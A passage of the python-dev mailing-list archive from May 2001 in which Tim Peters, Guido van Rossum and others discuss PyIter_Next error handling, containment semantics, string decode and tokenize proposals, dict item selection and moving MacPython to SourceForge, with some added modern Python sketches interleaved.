	/* Else StopIteration is implicit, and there is no error. */
	return NULL;
}

Then *calls* could be the simpler:

	op2 = PyIter_Next(it, &error);
	if (op2 == NULL) {
		if (error)
			goto Fail;
		break;
	}

Objections?  So far I'm almost the only user of PyIter_Next(); the only other
use is in ceval's FOR_ITER, which goes thru a similar dance.

However, I'm not clear on why FOR_ITER doesn't clear the exception if
PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
true -- that sure smells like a bug (but, if so, the change above would
squash it by magic).

Note that I'm not proposing to change the signature of the tp_iternext slot
similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.


From guido at digicool.com  Sat May  5 00:03:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 17:03:36 -0500
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400."
             <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>

> In spare moments, I've been plugging away at making various functions work
> nicely with iterators (map, min, max, etc).

For which efforts I extend my greatest thanks!

> Over and over this requires writing code of the form:
> 
[etc.]
> 
> This is wordy, obscure, and in my experience is needed every time I call
> PyIter_Next().
> 
> So I'd like to hide this in PyIter_Next instead, like so:
> 
> /* Return next item.
>  * If an error occurs, return NULL and set *error=1.
>  * If the iteration terminated normally, return NULL and set *error=0.
>  * Else return the next object and set *error=0.
>  */
> PyObject *
> PyIter_Next(PyObject *iter, int *error)
> {
[etc.]
> }

> Then *calls* could be the simpler:
> 
> 	op2 = PyIter_Next(it, &error);
> 	if (op2 == NULL) {
> 		if (error)
> 			goto Fail;
> 		break;
> 	}

I originally had this API for tp_iternext, and changed it to the
current API because I got tired of having to declare the error
variable.

How about making PyIter_Next() call PyErr_Clear() when the exception
is StopIteration?

Then calls could be

    op2 = PyIter_Next(it);
    if (op2 == NULL) {
        if (PyErr_Occurred())
            goto Fail;
        break;
    }

This is a tad slower and arguably generates more code (assuming an
extra call is slower than passing an extra argument and loading it)
but doesn't require declaring the error variable.
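The Python-level counterpart of that calling convention is the two-argument built-in next(). It swallows StopIteration and returns the default, while any other exception from the iterator propagates. Here is a sketch of a max()-style loop written that way; iter_max and _SENTINEL are hypothetical names.

```python
_SENTINEL = object()


def iter_max(iterable):
    """Return the largest item, mirroring the C loop shape above."""
    it = iter(iterable)
    best = next(it, _SENTINEL)
    if best is _SENTINEL:
        raise ValueError("iter_max() arg is an empty iterable")
    while True:
        item = next(it, _SENTINEL)  # StopIteration is swallowed here ...
        if item is _SENTINEL:       # ... so exhaustion is just "no more items"
            break                   # (the C analogue: NULL with no error set)
        if item > best:
            best = item
    return best


print(iter_max([3, 1, 4, 1, 5]))  # 5
```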

But since you're the customer, it's your choice.

> Objections?  So far I'm almost the only user of PyIter_Next(); the only other
> use is in ceval's FOR_ITER, which goes thru a similar dance.
> 
> However, I'm not clear on why FOR_ITER doesn't clear the exception if
> PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
> true -- that sure smells like a bug (but, if so, the change above would
> squash it by magic).

Smells like a bug indeed.

> Note that I'm not proposing to change the signature of the tp_iternext slot
> similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 23:18:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 17:18:16 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFMKAAA.tim.one@home.com>

[Tim]
>> In spare moments, I've been plugging away at ... iterators

[Guido]
> For which efforts I extend my greatest thanks!

Yet but a pale reflection of the thanks I extend to you for implementing
these guys to begin with:  they're *loads* of fun!  But not nearly as much
fun as playing with Perl, so they're still prudently Pythonic <wink>.

[T proposed adding an int* error arg to PyIter_Next()]

[G]
> How about making PyIter_Next() call PyErr_Clear() when the exception
> is StopIteration?
>
> Then calls could be
>
>     op2 = PyIter_Next(it);
>     if (op2 == NULL) {
>         if (PyErr_Occurred())
>             goto Fail;
>         break;
>     }

Perfect.  I'll do that later tonight, and update the PEP to match.

> This is a tad slower and arguably generates more code (assuming an
> extra call is slower than passing an extra argument and loading it)
> but doesn't require declaring the error variable.

Well, it's two more calls (since PyErr_Occurred() also makes a call to get
the thread state), but I don't really care because the client only does this
in case of error or end-of-iteration (which aren't the normal cases).  I was
dreading finding a spare int var to pass inside FOR_ITER anyway <wink>.


From paulp at ActiveState.com  Sat May  5 02:03:05 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Fri, 04 May 2001 17:03:05 -0700
Subject: [Python-Dev] ::
Message-ID: <3AF34339.9C553704@ActiveState.com>

I'll throw out a partially formed thought in case it is useful to
anybody.

"::" might be useful to solve another problem I've been struggling with:
how to have multiple package distributions share a namespace
(xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). 

"::" might mean, in general, that you are walking through abstract,
potentially merged namespaces and not through concrete dictionary
implementations. I think that Python's using the same syntax for package
namespaces and attribute accesses might seem more elegant than it is in
practice. Things that "seem like" they should work do not because
packages are fundamentally different than attributes:

>>> from xml import dom.minidom
  File "<stdin>", line 1
    from xml import dom.minidom
                       ^
SyntaxError: invalid syntax

Why isn't this symmetric? I would like to use "." on either side of the
import.

>>> import xml
>>> print xml.dom
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'xml' module has no attribute 'dom'
>>> from xml.dom import minidom
>>> print xml.dom
<module 'xml.dom' from 'c:\program files\python21\lib\xml\dom\__init__.pyc'>

I find it a little bit weird that importing one module has the side
effect of populating a package.
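In current Python 3, the dotted form after "from ... import" is still a syntax error, but the spellings below work. As the import-system documentation describes, importing a submodule also binds it as an attribute of its parent package, which is the side effect noted above. Here is a sketch using the stdlib xml package from the example.

```python
import importlib
import sys

# Three working spellings for the import wanted above:
import xml.dom.minidom              # binds the top-level name "xml"
from xml.dom import minidom         # binds only "minidom"
import xml.dom.minidom as minidom2  # binds the submodule under an alias

assert minidom is minidom2 is xml.dom.minidom

# Loading a submodule stores it on the parent package as an attribute.
dom_pkg = importlib.import_module("xml.dom")
print(sys.modules["xml"].dom is dom_pkg)  # True
```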
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Sat May  5 05:07:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 22:07:56 -0500
Subject: [Python-Dev] ::
In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST."
             <3AF34339.9C553704@ActiveState.com> 
References: <3AF34339.9C553704@ActiveState.com> 
Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com>

> I find it a little bit weird that importing one module has the side
> effect of populating a package.

That's just because you've seen too much Java. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sat May  5 10:13:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 05 May 2001 10:13:30 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
Message-ID: <3AF3B62A.50DD4115@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1 here.  Easily enough done via other means, and you just *know* different
> people will want different variants of tokenization (e.g., nobody in their
> right mind will want " two " coming back from that example, and, given that
> it does, that it doesn't also return " three" is baffling).

Ok. I rejected the patch, with a mild suggestion to take this on by
subclassing strings in Python 2.2 ;-)

> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> +1 from me:  it's the other half of the existing .encode() method, and the
> current lack of symmetry is icky.

Right.

If I hear no strong objections, I'll check in the .decode()
method next week.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Sat May  5 13:45:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 06:45:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200."
             <3AF0662D.48671B4E@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
            <3AF0662D.48671B4E@lemburg.com> 
Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com>

> I've attached the patch. Due to a small reorganisation the
> patch is a little longer -- symmetry has its price at C level
> too ;-)

Looks good on paper, so go ahead and check it in.  Watch out for
potential changes caused by Tim's iter-crusade!  :-)

While you're at it, why don't you check in the rot13 codec you posted
-- it's good to have simple examples in the standard library.
It would also be cool to have codecs for common file encodings like
base64, quoted-printable, binhex, uuencode, and even hex
(binascii.hexlify).
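For what it's worth, Python 3 ships codecs along these lines, reachable through codecs.encode() and codecs.decode(). rot13 is a str-to-str codec, while base64, quoted-printable and hex are bytes-to-bytes codecs. Here is a round-trip sketch:

```python
import codecs

print(codecs.encode("hello", "rot13"))  # uryyb

payload = b"caf\xe9 au lait\n"
for name in ("base64", "quopri", "hex"):
    encoded = codecs.encode(payload, name)
    # Each codec's decode() undoes its encode().
    assert codecs.decode(encoded, name) == payload
    print(name, encoded)
```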

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:15:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:15:52 -0500
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200."
             <3AF3B62A.50DD4115@lemburg.com> 
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>  
            <3AF3B62A.50DD4115@lemburg.com> 
Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com>

> Ok. I rejected the patch with a mild response to take on this by
> subclassing strings in Python 2.2 ;-)

Gustavo didn't take the rejection well.  He contacted me asking for a
better explanation, and we got into a bit of an argument about how
much I must explain my decisions, but I think he understands now.

> If I hear no strong objections, I'll check in the .decode()
> method next week.

Yes, see my previous reply.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:24:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:24:19 -0500
Subject: [Python-Dev] PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST."
             <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
References: <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>

In a checkin message, Tim wrote:
> The full story for instance objects is pretty much unexplainable, because
> instance_contains() tries its own flavor of iteration-based containment
> testing first, and PySequence_Contains doesn't get a chance at it unless
> instance_contains() blows up.  A consequence is that
>     some_complex_number in some_instance
> dies with a TypeError unless some_instance.__class__ defines __iter__ but
> does not define __getitem__.

This kind of thing happens everywhere -- instances always define all
slots but using the slots sometimes fails when the corresponding
__foo__ doesn't exist.  Decisions based on the presence or absence of
a slot are therefore in general not reliable; the only exception is
the decision to *call* the slot or not.  The correct solution is not
to catch AttributeError and pretend that the slot didn't exist (which
would mask an AttributeError occurring inside the __contains__ method
if there was one), but to reimplement the default behavior in the
instance slot implementation.

In this case, that means that PySequence_Contains() can be simplified
(no need to test for AttributeError), and instance_contains() should
fall back to a loop over iter(self) rather than trying to use
instance_item().
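Here is a simplified Python model of the resolution order proposed above, roughly what "in" does in Python 3 today. It uses an explicit __contains__ if the type defines one, otherwise a loop over iter(), otherwise the old __getitem__ protocol. Elements are compared with identity-or-== rather than a three-way compare, so a complex number no longer blows up. contains() is a hypothetical helper, not CPython's code.

```python
def contains(container, item):
    """Simplified model of how `item in container` is resolved in Python 3."""
    cls = type(container)
    # 1. An explicit __contains__ wins; look it up on the type, and let any
    #    AttributeError raised *inside* it propagate instead of guessing.
    if getattr(cls, "__contains__", None) is not None:
        return bool(cls.__contains__(container, item))
    # 2. Otherwise fall back to iteration, comparing by identity or equality.
    if getattr(cls, "__iter__", None) is not None:
        return any(x is item or x == item for x in container)
    # 3. Last resort: the old __getitem__ protocol with indexes 0, 1, 2, ...
    if getattr(cls, "__getitem__", None) is not None:
        i = 0
        while True:
            try:
                x = container[i]
            except IndexError:
                return False
            if x is item or x == item:
                return True
            i += 1
    raise TypeError(f"argument of type {cls.__name__!r} is not iterable")
```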

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 22:40:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 16:40:11 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>

[Guido]
> This kind of thing happens everywhere -- instances always define all
> slots but using the slots sometimes fails when the corresponding
> __foo__ doesn't exist.  Decisions based on the presence or absence of
> a slot are therefore in general not reliable; the only exception is
> the decision to *call* the slot or not.  The correct solution is not
> to catch AttributeError and pretend that the slot didn't exist (which
> would mask an AttributeError occurring inside the __contains__ method
> if there was one),

Ya, it sucks.  I was inspired by the fact that instance_contains() itself makes
dubious assumptions about what an AttributeError means when the functions
*it* calls raise it <wink>.

> but to reimplement the default behavior in the instance slot
> implementation.

The "backward compatibility" comment in instance_contains() was scary:
compatibility with *what*?  instance_contains() is pretty darn new.  I
assumed it meant there was *some* good (but unidentified) reason we had to
use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
instance_item() "worked".  But I haven't thought of one, except to ensure
that

    some_complex  in  some_instance_with___getitem__

continues to blow up -- but that's not a good reason.  So:

> In this case, that means that PySequence_Contains() can be simplified
> (no need to test for AttributeError), and instance_contains() should
> fall back to a loop over iter(self) rather than trying to use
> instance_item().

Will do!


From guido at digicool.com  Sat May  5 23:48:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 16:48:33 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400."
             <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>

> [Guido]
> > This kind of thing happens everywhere -- instances always define all
> > slots but using the slots sometimes fails when the corresponding
> > __foo__ doesn't exist.  Decisions based on the presence or absence of
> > a slot are therefore in general not reliable; the only exception is
> > the decision to *call* the slot or not.  The correct solution is not
> > to catch AttributeError and pretend that the slot didn't exist (which
> > would mask an AttributeError occurring inside the __contains__ method
> > if there was one),

[Tim]
> Ya, it sucks.  I was inspired by the fact that instance_contains() itself makes
> dubious assumptions about what an AttributeError means when the functions
> *it* calls raise it <wink>.

Actually, instance_contains checks for AttributeError only after
calling instance_getattr(), whose only purpose is to return the
requested attribute or raise AttributeError, so here it is safe: the
__contains__ function hasn't been called yet.

> > but to reimplement the default behavior in the instance slot
> > implementation.
> 
> The "backward compatibility" comment in instance_contains() was scary:
> compatibility with *what*?

With previous behavior of 'x in instance'.  Before we had
__contains__, 'x in y' *always* iterated over the items of y as a
sequence, comparing them to x one at a time.  The loop does that.

> instance_contains() is pretty darn new.  I
> assumed it meant there was *some* good (but unidentified) reason we had to
> use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
> instance_item() "worked".

No, that was probably just an oversight -- clearly it should have used
rich comparisons.  (I guess this is a disadvantage of the approach I'm
recommending here: if the default behavior changes, the
reimplementation of the default behavior in the class must be changed
too.)

> But I haven't thought of one, except to ensure
> that
> 
>     some_complex  in  some_instance_with___getitem__
> 
> continues to blow up -- but that's not a good reason.

Indeed not.

> So:
> 
> > In this case, that means that PySequence_Contains() can be simplified
> > (no need to test for AttributeError), and instance_contains() should
> > fall back to a loop over iter(self) rather than trying to use
> > instance_item().
> 
> Will do!

Thanks!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:24:58 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:24:58 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>

[Guido]
> Actually, instance_contains checks for AttributeError only after
> calling instance_getattr(), whose only purpose is to return the
> requested attribute or raise AttributeError, so here it is safe: the
> __contains__ function hasn't been called yet.

I'd say "safer", but not "safe":  at that point we only know that *some*
attribute didn't exist, somewhere, while attempting to look up
"__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
hook, like

    def __getattr__(self, attr):
        return global_resolver.resolve(self, attr)

where global_resolver has lost its "resolve" attr.  "except" clauses aren't
more bulletproof in C than in Python <0.9 wink>.
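A small Python sketch of the hazard. It assumes the lookup can be modeled by getattr() plus an "except AttributeError" clause; Resolver, Proxy and has_contains_hook() are hypothetical names. The broken resolver's own AttributeError is indistinguishable from "there is no __contains__ here".

```python
class Resolver:
    """Hypothetical stand-in for global_resolver after it lost 'resolve'."""


global_resolver = Resolver()


class Proxy:
    def __getattr__(self, attr):
        # Bug: Resolver has no 'resolve', so this line itself raises
        # AttributeError for every attribute that reaches __getattr__.
        return global_resolver.resolve(self, attr)


def has_contains_hook(obj):
    """Mimic the C logic under discussion: look up __contains__ and treat
    any AttributeError as 'the hook is not defined'."""
    try:
        getattr(obj, "__contains__")
    except AttributeError:
        return False
    return True


print(has_contains_hook(Proxy()))  # False, and the resolver bug stays hidden

# Without the except clause, the real cause becomes visible.
try:
    getattr(Proxy(), "__contains__")
except AttributeError as exc:
    print("actual cause:", exc)
```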

> With previous behavior of 'x in instance'.  Before we had
> __contains__, 'x in y' *always* iterated over the items of y as a
> sequence, comparing them to x one at a time.

I don't believe I ever knew that!  Thanks.  I erroneously assumed that the
looping behavior was *introduced* when __contains__ was added.

> ...
> No, that was probably just an oversight -- clearly it should have used
> rich comparisons.  (I guess this is a disadvantage of the approach I'm
> recommending here: if the default behavior changes, the
> reimplementation of the default behavior in the class must be changed
> too.)

I factored out the new iterator-based __contains__ logic into a new private
API function, called when appropriate by both PySequence_Contains() and
instance_contains().  So any future changes to what iterator-based
__contains__ means will only need to be made in one place.

too-easy<wink>-ly y'rs  - tim


From guido at digicool.com  Sun May  6 00:31:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 17:31:05 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400."
             <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>

> [Guido]
> > Actually, instance_contains checks for AttributeError only after
> > calling instance_getattr(), whose only purpose is to return the
> > requested attribute or raise AttributeError, so here it is safe: the
> > __contains__ function hasn't been called yet.

[Tim]
> I'd say "safer", but not "safe":  at that point we only know that *some*
> attribute didn't exist, somewhere, while attempting to look up
> "__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
> hook, like
> 
>     def __getattr__(self, attr):
>         return global_resolver.resolve(self, attr)
> 
> where global_resolver has lost its "resolve" attr.  "except" clauses aren't
> more bulletproof in C than in Python <0.9 wink>.

Yes, but attribute errors inside __getattr__ hooks are *always* a
problem to debug, since raising AttributeError is part of its job.  So
this is not new.  I should have said "as safe as it gets."

> > With previous behavior of 'x in instance'.  Before we had
> > __contains__, 'x in y' *always* iterated over the items of y as a
> > sequence, comparing them to x one at a time.
> 
> I don't believe I ever knew that!  Thanks.  I erroneously assumed that the
> looping behavior was *introduced* when __contains__ was added.

Surely you knew that "x in y" looped over the items of y?  What else
could it have done?  It was only defined on sequences!

> > ...
> > No, that was probably just an oversight -- clearly it should have used
> > rich comparisons.  (I guess this is a disadvantage of the approach I'm
> > recommending here: if the default behavior changes, the
> > reimplementation of the default behavior in the class must be changed
> > too.)
> 
> I factored out the new iterator-based __contains__ logic into a new private
> API function, called when appropriate by both PySequence_Contains() and
> instance_contains().  So any future changes to what iterator-based
> __contains__ means will only need to be made in one place.

Cool.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:53:51 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:53:51 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHHKAAA.tim.one@home.com>

[Guido]
> ...
> Surely you knew that "x in y" looped over the items of y?  What else
> could it have done?  It was only defined on sequences!

What's a sequence <wink>?  I expect I assumed that enduring a Python method
call for every element of an *instance* was so expensive that Python didn't
bother implementing "in" for instances (just for builtin sequences like lists
and strings etc).  I *know* I assumed it was so expensive that I never tried
it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting
"if x in s" where s was a tuple, list or string of length no more than 4; for
anything bigger I always used a dict or bisect).  So it's a personal blind
spot likely due to never looking in that direction.
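For the "dict or bisect" alternatives mentioned above, here is a sketch using today's bisect module, with a set shown for comparison. sorted_contains() is a made-up helper, and the list must already be sorted.

```python
import bisect


def sorted_contains(sorted_items, x):
    """Membership test on an already-sorted list in O(log n) comparisons."""
    i = bisect.bisect_left(sorted_items, x)  # leftmost slot where x could go
    return i < len(sorted_items) and sorted_items[i] == x


primes = [2, 3, 5, 7, 11, 13]
print(sorted_contains(primes, 7), sorted_contains(primes, 8))  # True False

# A dict (or, in later Pythons, a set) gives average O(1) membership tests.
prime_set = set(primes)
print(7 in prime_set)  # True
```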


From paul at pfdubois.com  Sun May  6 03:10:37 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Sat, 5 May 2001 18:10:37 -0700
Subject: [Python-Dev] multiple inheritance -- what I meant
Message-ID: <ADEOIFHFONCLEEPKCACCKEPMCIAA.paul@pfdubois.com>

When I suggested a modification to the inheritance clause,

class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

class X (Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo

I meant two things by my suggestion:

1. I meant that Y.a would never be found when searching for X.a.

In particular, if Z.a exists, and a is not explicitly defined in X, X.a is
Z.a.

2. More philosophically, rather than being a consequence of the language
like the second method is, the proposed syntax is intended to be a clear
message to someone reading the class about how the inherited names are being
handled. Compare the effort required of a reader to understand these two.
(If you think the second one is easier, you probably attended Spam III.)
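To make point 1 concrete, here is a sketch in current Python. The class and method names follow the message; the method bodies are made up. With the alias-based translation, the old name a still resolves to Y.a, because Y precedes Z in the base-class list. The proposal would make X.a resolve to Z.a instead, which can only be approximated by hand today.

```python
class Y:
    def a(self):
        return "Y.a"

    def c(self):
        return "Y.c"


class Z:
    def a(self):
        return "Z.a"

    def foo(self):
        return "Z.foo"


class X(Y, Z):
    # The translation suggested in the thread: add aliases, keep old names.
    b = Y.a
    d = Y.c
    bar = Z.foo


x = X()
print(x.b())  # Y.a  (the alias works)
print(x.a())  # Y.a  (but Y.a is still found first when searching for X.a)


class XRenamed(Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo
    a = Z.a  # hand-written approximation of point 1: X.a is now Z.a


print(XRenamed().a())  # Z.a
```

The hand-written version is only an approximation: the reader still has to reconstruct the renaming from a list of assignments, which is exactly what point 2 objects to.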

If you can rename in this way there are no problems with multiple
inheritance.

To be complete you should probably also allow

Y undefine x, ...

which simply makes Y.x unavailable from X.


From Greg.Wilson at baltimore.com  Sun May  6 18:26:00 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Sun, 6 May 2001 12:26:00 -0400 
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>

Has anyone else found themselves wanting a method that
chooses and returns a dictionary element at random, without
removing it (as popitem does)?  Or is there some way to
tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG?

Thanks
Greg


From tim.one at home.com  Sun May  6 20:15:57 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 6 May 2001 14:15:57 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>

[Greg Wilson]
> Has anyone else found themselves wanting a method that
> chooses and returns a dictionary element at random,

Do you mean "random" or "arbitrary"?  "random" means every dict entry is
equally likely to be chosen; "arbitrary" means nothing is defined about the
result (except that it *is* a dict entry).  random is much more expensive to
implement (under the covers it's a vector, but a vector with holes, so you
can't just pick a *slot* at random then "slide over" to the first non-hole
(else a given entry's chance of being selected would be proportional to the #
of contiguous holes adjacent to it)).
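The bias can be checked with a toy model. Here a plain list stands in for the dict's slot vector, with None marking a hole. Wrapping around at the end of the vector is an assumption of the model, and both helper names are made up. random_item() shows the unbiased alternative, which pays O(len(d)) to copy the items.

```python
import random
from collections import Counter
from fractions import Fraction


def slide_over_odds(slots):
    """Exact odds of each entry under 'pick a random slot, then slide
    forward to the first occupied slot' (wrapping around at the end)."""
    if all(s is None for s in slots):
        raise ValueError("no occupied slots")
    n = len(slots)
    hits = Counter()
    for start in range(n):  # every starting slot is equally likely
        i = start
        while slots[i] is None:
            i = (i + 1) % n
        hits[slots[i]] += 1
    return {entry: Fraction(count, n) for entry, count in hits.items()}


def random_item(d):
    """Uniformly random (key, value) pair; O(len(d)) because it copies."""
    if not d:
        raise KeyError("random_item passed an empty dict")
    return random.choice(list(d.items()))


print(slide_over_odds(["A", None, None, "B", "C", None]))
# A: 1/3, B: 1/2, C: 1/6
```

B sits right after a run of two holes and is picked half the time, while C, with no hole before it, gets only 1/6: each entry's chance grows with the run of holes just before it.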

> without removing it (as popitem does)?

Note that, in the sense above, popitem() returns an arbitrary element.

> Or is there some way to tell popitem to return a value without
> mutating the container?

No.  Easy to write an efficient function that does, though:

def arb(dict):
    k, v = pair = dict.popitem()
    dict[k] = v  # restore the entry
    return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't
mutate the dict even under the covers:

def arb(dict):
    if dict:
        return dict.iteritems().next()
    raise KeyError("arb passed an empty dict")

> If neither, would this be useful, or is it DHG?

Do you have a particular algorithm, or class of algorithms, in mind for which
it is useful?  popitem's current behavior is most useful for me in the set
algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set
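Here is a runnable version of that loop, applied to a hypothetical problem: finding every node reachable in a graph given as a dict of successor lists. The graph format and reachable() are assumptions made for illustration. In Python 3, popitem() removes the most recently inserted pair, but the loop does not depend on which pair comes out.

```python
def reachable(graph, start):
    """Nodes reachable from start, using a dict as the working set and
    popitem() to take an arbitrary element each time around the loop."""
    seen = set()
    working_set = {start: None}  # the values are never used
    while working_set:
        x, dontcare = working_set.popitem()
        seen.add(x)
        for y in graph.get(x, ()):  # processing may add more elements
            if y not in seen:
                working_set[y] = None
    return seen


graph = {"a": ["b", "c"], "b": ["d"], "c": ["d"], "d": ["a"], "e": ["a"]}
print(sorted(reachable(graph, "a")))  # ['a', 'b', 'c', 'd']
```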


From jack at oratrix.nl  Mon May  7 11:39:43 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:39:43 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl>

Folks,
now that there's finally a decent (well, somewhat decent:-) Mac CVS client 
that supports ssh I'd like to move MacPython to sourceforge. There are two ways 
I can go about this: start a new MacPython project or merge the MacPython 
stuff into the main Python CVS repository.

The Mac specific stuff for Python is all concentrated in a single subtree Mac 
of the main Python tree (the subtree has its own hierarchy of 
Python/Modules/Lib/etc directories), so putting it in the main repository 
should not pollute the file namespace all that much. It would also have the 
advantage that a single "cvs update" would update everything (whereas the 
current situation for Mac developers, where Python/Mac is from a different 
CVSROOT than Python, does not have that advantage). The downside is that 
everyone who does a full checkout of the tree would get an extra 1000 or so 
files on their disk that are pretty useless unless they have a mac.

Oh yes, another plus for putting stuff in the main repository is MacOSX 
support. Some MacPython modules have been "ported" to MacOSX, and I've started 
on adding them to setup.py, and life would become a lot simpler for people 
compiling on MacOSX if they had everything available automatically.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:45:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:45:59 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl>

To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
